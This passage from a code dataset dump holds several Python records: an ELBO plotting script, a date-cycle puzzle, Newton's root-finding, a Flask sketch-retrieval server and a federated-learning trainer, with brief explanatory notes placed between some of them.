plt.title(title)\n\n plt.savefig(os.path.join('pics/binarized_mnist/elbos', run + '.png'))\n\n plt.clf()\n\n else:\n\n pass\n\n if compare:\n\n plt.savefig(os.path.join('pics/binarized_mnist/elbos', '__'.join(runs) + '.png'))\n","sub_path":"plot_elbos_binarized_mnist.py","file_name":"plot_elbos_binarized_mnist.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
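`findnth` returns the character index of the (n+1)-th occurrence of a substring, which is what lets the script slice the ELBO value out of a log line. A quick check with a made-up log line in the same shape:

```python
def findnth(string, substring, n):
    parts = string.split(substring, n + 1)
    if len(parts) <= n + 1:
        return -1
    return len(string) - len(parts[-1]) - len(substring)

line = "Iteration 12: average ELBO -95.3 (nats)"
# the script slices between the 4th and 5th space to pull out the number
print(line[findnth(line, " ", 3) + 1: findnth(line, " ", 4)])  # -95.3
```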
+{"seq_id":"633356801","text":"import sys\n\n\ndef solution():\n E, S, M = map(int, sys.stdin.readline().split())\n e, s, m = 1, 1, 1\n count = 1\n while True:\n if e == E and s == S and m == M:\n return count\n e += 1\n s += 1\n m += 1\n if not e <= 15:\n e = 1\n if not s <= 28:\n s = 1\n if not m <= 19:\n m = 1\n count += 1\n\n\nprint(solution())","sub_path":"python/implementation/1476_날짜계산.py","file_name":"1476_날짜계산.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"652122116","text":"# James Morrissey\n# computingID: jpm9rk\n# Use Newton's method to approximate all real roots\n# Newton's Method Applied to e^x + x^2 - x - 4\n\nimport math\n\n\nITERATION_MAX = 100 # max number of iterations\np_initial = 1 # initial point used to find the positive root\np_initial_prime = -2 # initial point used to find the negative root\nPRECISION = 10**(-6) # define the stopping precision\n\ndef function(xvalue): # the function we wish to find the roots of\n yvalue = math.exp(xvalue) + xvalue**2 - xvalue - 4\n return yvalue\n\n\ndef function_derivative(xvalue): # derivative of the previous function\n yvalue = math.exp(xvalue) + 2*xvalue - 1\n return yvalue\n\n\ndef iteration_function(p): # the iteration function for newtons method\n root_approximation = p - function(p)/function_derivative(p)\n return root_approximation\n\n\nfor i in range(ITERATION_MAX): # converges to the positive root\n estimated_root = iteration_function(p_initial)\n estimated_error = abs(estimated_root - p_initial)\n print('the estimated root for iteration', i, 'is', estimated_root)\n print(' the absolute error approximation is', estimated_error)\n p_initial = estimated_root\n if estimated_error < PRECISION: # stopping condition\n print('desired precision achieved')\n break\n\n\nfor i in range(ITERATION_MAX): # converges to the negative root\n estimated_root = iteration_function(p_initial_prime)\n estimated_error = abs(estimated_root - p_initial_prime)\n print('the estimated root for iteration', i, 'is', estimated_root)\n print(' the absolute error approximation is', estimated_error)\n p_initial_prime = estimated_root\n if estimated_error < PRECISION: # stopping condition\n print('desired precision achieved')\n break\n\n# NOTE: Newton's method is highly dependent on the starting value, so I plotted the function to get an idea of where\n# the roots were located, and used 2 separate but identical for loops\n","sub_path":"MORRISSEY_24_14.py","file_name":"MORRISSEY_24_14.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
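The two loops above are plain Newton iterations, p ← p − f(p)/f′(p), started once in each basin of attraction. The same scheme compacted into a reusable function, for the same f:

```python
import math

f = lambda x: math.exp(x) + x**2 - x - 4
fp = lambda x: math.exp(x) + 2*x - 1   # derivative of f

def newton(p, tol=1e-6, max_iter=100):
    for _ in range(max_iter):
        p_next = p - f(p) / fp(p)
        if abs(p_next - p) < tol:
            return p_next
        p = p_next
    return p

print(newton(1))    # ~1.2887  (positive root)
print(newton(-2))   # ~-1.5071 (negative root)
```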
+{"seq_id":"103597040","text":"#!/usr/bin/python3\n\nimport os\n# set caffe logging to warnings & errors only\nos.environ['GLOG_minloglevel'] = '2'\n\nfrom flask import Flask, request, jsonify, send_from_directory\nfrom io import BytesIO\nfrom PIL import Image\nimport base64\nimport numpy as np\nimport caffe\nfrom sklearn.neighbors import NearestNeighbors\n\ndef load_model(model_root):\n pretrained_model = model_root + 'final.caffemodel' \n sketch_proto = model_root + 'sketchdeploy.prototxt'\n model = caffe.Net(sketch_proto, pretrained_model, caffe.TEST)\n # seems a little strange to have a transform on the sketch images?\n transformer = caffe.io.Transformer({'data': np.shape(model.blobs['data'].data)})\n transformer.set_mean('data', np.array([104, 117, 123]))\n transformer.set_transpose('data',(2,0,1))\n transformer.set_channel_swap('data', (2,1,0))\n transformer.set_raw_scale('data', 255.0)\n return model, transformer\n\ndef load_datasets(datasets_root, n_neighbors=10):\n datasets = {}\n dataset_names = next(os.walk(datasets_root))[1]\n for dataset_name in dataset_names:\n print('Loading dataset ' + dataset_name)\n filenames_path = os.path.join(datasets_root, dataset_name, 'filenames.txt')\n features_path = os.path.join(datasets_root, dataset_name, 'features.npy')\n filenames = open(filenames_path).read().splitlines()\n features = np.load(features_path)\n neighbors = NearestNeighbors(n_neighbors=n_neighbors, algorithm='brute', metric='cosine').fit(features)\n datasets[dataset_name] = {\n 'filenames': filenames,\n 'features': features,\n 'neighbors': neighbors\n }\n return datasets\n\ndef get_features(transformer, model, img):\n sketch = [transformer.preprocess('data', img)]\n sketch = np.asarray(sketch)\n results = model.forward(data=sketch)\n features = results['pool5/7x7_s1_s'].reshape(-1)\n return features\n\ndef get_knn_filenames(dataset, features):\n features = features.reshape(1, -1)\n knns = dataset['neighbors'].kneighbors(features)\n indices = knns[1].reshape(-1)\n filenames = [dataset['filenames'][i] for i in indices]\n return filenames\n\ndef base64_png_to_numpy(data):\n return np.array(Image.open(BytesIO(base64.b64decode(data))))\n\ncaffe.set_mode_gpu()\nmodel, transformer = load_model('../models/triplet_googlenet/Triplet_googlenet_')\ndatasets = load_datasets('../../datasets')\n\napp = Flask(__name__)\n\n@app.route('/sketchy')\ndef root():\n return app.send_static_file('index.html')\n\n@app.route('/sketchy/download/<dataset>/<image>')\ndef send_js(dataset, image):\n root = os.path.join('static', 'datasets', dataset, 'images')\n return send_from_directory(root, image)\n\n@app.route('/sketchy/upload/<dataset>', methods=['POST'])\ndef upload(dataset):\n img = base64_png_to_numpy(request.data)\n img = img.astype(float) / 255\n features = get_features(transformer, model, img)\n filenames = get_knn_filenames(datasets[dataset], features)\n return jsonify(filenames)\n\napp.run(host='0.0.0.0', port=5000)\n","sub_path":"code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
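Stripped of caffe and Flask, the retrieval path in `upload` is cosine k-nearest-neighbours over precomputed feature vectors. A toy version with 4-dimensional stand-ins for the pool5 features (filenames are made up):

```python
import numpy as np
from sklearn.neighbors import NearestNeighbors

filenames = ["cat.png", "dog.png", "car.png"]
features = np.array([[1.0, 0.1, 0.0, 0.0],
                     [0.9, 0.2, 0.1, 0.0],
                     [0.0, 0.0, 1.0, 0.9]])
nn = NearestNeighbors(n_neighbors=2, algorithm="brute", metric="cosine").fit(features)

query = np.array([1.0, 0.0, 0.1, 0.0]).reshape(1, -1)  # stand-in for a sketch's features
_, indices = nn.kneighbors(query)
print([filenames[i] for i in indices.reshape(-1)])     # ['cat.png', 'dog.png']
```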
+{"seq_id":"289834399","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport os\nimport multiprocessing\nfrom multiprocessing import Manager\nimport copy\nimport time\nimport numpy as np\nfrom tqdm import tqdm\nimport xlwt\nimport torch\nfrom options import args_parser\nfrom update import LocalUpdate, test_inference\nfrom models import *\nfrom utils import *\nfrom collections import OrderedDict\nfrom xlutils.copy import copy as xlcopy\nfrom xlrd import open_workbook\n\n\n\n\ndef client(i, dic, args, train_dataset, user_images, idx, global_model, epoch):\n # set device\n device_id = (i + 2) % 3\n torch.cuda.set_device(device_id)\n device = 'cuda' \n global_model.to(device)\n print('client id = ' + str(i))\n\n local_model = LocalUpdate(args=args, dataset=train_dataset,\n idxs=user_images, \n user_index=idx, device=device)\n\n w, loss, batchLoss, train_acc = local_model.update_weights(\n model=copy.deepcopy(global_model), global_round=epoch)\n\n tmp = {}\n tmp_w = OrderedDict()\n\n for key, values in w.items():\n tmp_w[key] = values.to('cpu')\n\n tmp['local_weights'] = tmp_w\n tmp['local_losses'] = loss\n\n dic[str(i)] = tmp\n\n \n\n\nif __name__ == '__main__':\n torch.multiprocessing.set_start_method('spawn')\n\n args = args_parser()\n\n f_xls, sheet1 = init_log(args)\n\n start_time1 = time.time()\n \n\n # create directories\n save_path = './EPPFL/save/'\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n folder_name = args.task\n model_path = './EPPFL/save/{}/'.format(folder_name)\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n\n ckp_path = model_path + 'ckps/'\n if not os.path.exists(ckp_path):\n os.mkdir(ckp_path)\n\n # set device\n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu'\n\n # load dataset and user groups\n train_dataset, test_dataset, user_groups = get_dataset(args)\n\n # build model\n if args.model == 'VGG19':\n global_model = VGG19(args=args)\n else:\n exit('Error: unrecognized model')\n\n\n # copy weights\n global_weights = global_model.state_dict()\n\n # Training\n train_loss, test_accuracy = [], []\n val_acc_list, net_list = [], []\n cv_loss, cv_acc = [], []\n\n print_every = 10\n val_loss_pre, counter = 0, 0\n iter_num = 1\n \n # Continue training from a checkpoint\n if args.contfrom != 0:\n global_model = torch.load(ckp_path + str(args.contfrom))\n global_weights = global_model.state_dict()\n f_xls = open_workbook('./EPPFL/save/{}/{}.xls'.format(folder_name, folder_name),formatting_info=True)\n f_xls = xlcopy(f_xls) \n sheet1 = f_xls.get_sheet(0)\n\n \n for epoch in tqdm(range(args.epochs)):\n epoch += args.contfrom + 1\n epoch_start_time = time.time()\n local_weights, local_losses = [], []\n\n print(f'\\n | Global Training Round : {epoch} |\\n')\n\n global_model.train()\n num_active_users = max(int(args.frac * args.num_users), 1)\n idxs_users = np.random.choice(range(args.num_users), num_active_users, replace=False)\n\n process_list = []\n dic = Manager().dict()\n\n # training local models\n for i in range(0, num_active_users):\n idx = idxs_users[i]\n user_images = user_groups[idx]\n\n p = multiprocessing.Process(target=client, args=(i, dic, args, \n train_dataset, user_images, idx, global_model, epoch))\n p.start()\n process_list.append(p)\n\n for p in process_list:\n p.join()\n\n for p in process_list:\n p.terminate()\n \n # update global weights\n for key, item in dic.items():\n tmp = OrderedDict()\n for innerkey, value in item['local_weights'].items():\n tmp[innerkey] = value.to(device)\n\n local_weights.append(tmp)\n local_losses.append(item['local_losses'])\n \n # merge models\n global_weights = average_weights(local_weights)\n\n\n global_model.load_state_dict(global_weights)\n loss_avg = sum(local_losses) / len(local_losses) # global training loss\n train_loss.append(loss_avg)\n\n # Calculate avg training accuracy over all users at every epoch\n list_acc, list_loss = [], []\n global_model.eval()\n\n for idx in range(1):\n global_model.to(device)\n acc, _ = test_inference(args=args, test_dataset=test_dataset,model=copy.deepcopy(global_model))\n global_model.to('cpu')\n list_acc.append(acc)\n \n test_accuracy.append(sum(list_acc)/len(list_acc))\n avg_acc = sum(list_acc)/len(list_acc)\n\n sheet1.write(1+epoch, int(6) ,avg_acc)\n sheet1.write(1+epoch, int(7) ,sum(train_loss)/len(train_loss))\n sheet1.write(1+epoch, int(8) ,time.time() - epoch_start_time)\n f_xls.save('./EPPFL/save/{}/{}.xls'.format(folder_name, folder_name))\n \n\n if (epoch+1) % print_every == 0:\n 
torch.save(global_model, ckp_path + str(epoch))\n print(f' \\nAvg Training Stats after {epoch+1} global rounds:')\n print(f'Training Loss : {np.mean(np.array(train_loss))}')\n print('Train Accuracy: {:.2f}% \\n'.format(100*test_accuracy[-1]))\n print('\\n Run Time: {0:0.4f}'.format(time.time()-epoch_start_time))\n\n train_loss = []\n\n print(f' \\n Results after {args.epochs} global rounds of training:')\n print(\"|---- Avg Train Accuracy: {:.2f}%\".format(100*test_accuracy[-1]))\n print(\"|---- Test Accuracy: {:.2f}%\".format(100*acc))\n print('|---- Total Run Time: {0:0.4f}'.format(time.time()-start_time1))\n\n f_xls.save('./EPPFL/save/{}/{}.xls'.format(folder_name, folder_name))\n\n\n\n\n\n \n\n \n\n \n \n\n ","sub_path":"src/federated_main.py","file_name":"federated_main.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
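`average_weights` in the federated script is imported from `utils`, which is not shown here; plain FedAvg with equal client weights would reduce to an element-wise mean over the clients' state dicts, roughly as in this sketch (a guess at the presumed behaviour, not the project's actual code):

```python
import copy
import torch
from collections import OrderedDict

def average_weights(local_weights):
    # Element-wise mean of client state_dicts (FedAvg with equal client weights).
    avg = copy.deepcopy(local_weights[0])
    for key in avg.keys():
        for w in local_weights[1:]:
            avg[key] += w[key]
        avg[key] = torch.div(avg[key], len(local_weights))
    return avg

a = OrderedDict(w=torch.tensor([2.0, 4.0]))
b = OrderedDict(w=torch.tensor([4.0, 8.0]))
print(average_weights([a, b])["w"])  # tensor([3., 6.])
```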